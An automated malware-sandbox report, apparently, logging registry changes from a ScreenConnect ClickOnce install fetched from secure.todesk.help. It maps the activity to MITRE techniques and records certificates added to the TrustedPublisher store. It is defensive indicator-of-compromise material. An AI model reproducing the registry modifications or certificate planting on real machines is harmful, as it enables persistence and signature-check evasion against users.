Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\DigestValue = f271ebc2542397e59c3d57d30cc54bf1d9db4f69	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\DigestValue = 0323ee0e1faa4aa0e33fb6c6147290aa71637ebd	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies	dfsvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\StateStore_RandomString = "5JC1T7WMM6QE8LZKMNQOADKE"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_777 = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\lock!0a000000a479570e1c0d0000640b00000000000000000000 = 30303030306431632c30316462343766383863646563633162	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\Files\ScreenConnect.Core.dll_b96889d378047e27 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 680074007400700073003a002f002f007300650063007500720065002e0074006f006400650073006b002e00680065006c0070002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006d0061006e00690066006500730074000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_777 = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\DigestValue = 6b4b581fc4e3ecb91b24ec601daa0594106bcc5d	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_5520ab643a204b88	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd\LastRunVersion = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_777 = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\DigestValue = 1220987627782d3c3397d4abf01ac3777999e01c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\SubstructureCreated = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\PreparedForExecution = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_777 = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3a	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\Files\ScreenConnect.ClientService.dll_e781b1c636 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575\lock!10000000a479570e1c0d0000640b00000000000000000000 = 30303030306431632c30316462343766383863646563633162	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_777 = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_5520ab643a204b88	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30003000300031002f00300031002f00300031002000300030003a00300030003a00300030000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\appid = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\Files\ScreenConnect.WindowsBackstageShell.exe_89 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 460061006c00730065000000	dfsvc.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3308	reg.exe
1604	reg.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	Statement.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	Statement.Client.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	Statement.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa